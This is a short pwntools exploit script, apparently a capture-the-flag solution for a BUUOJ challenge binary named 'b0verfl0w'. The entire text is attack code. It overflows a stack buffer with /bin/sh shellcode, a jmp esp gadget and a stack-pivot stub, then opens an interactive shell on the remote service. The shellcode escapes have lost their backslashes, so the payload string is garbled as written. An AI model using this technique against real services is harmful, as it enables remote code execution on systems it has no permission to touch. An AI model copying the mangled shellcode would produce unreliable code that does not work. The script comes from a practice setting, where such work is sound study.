exp
from pwn import *
context.binary = './b0verfl0w'
#io = process('./b0verfl0w')
io = remote('node3.buuoj.cn','27459')
jmp_esp = 0x8048504
shellcode = "x68xcdx80x68x68xebxfcx68"
shellcode += "x6ax0bx58x31xd2x52x68x2f"
shellcode += "x2fx73x68x68x2fx62x69x6e"
shellcode += "x89xe3x52x53x89xe1xebxe1"
payload = shellcode
payload = payload.ljust(0x24,'a')
payload += p32(jmp_esp)
payload += asm('sub esp,0x28;jmp esp')
io.sendline(payload)
io.interactive()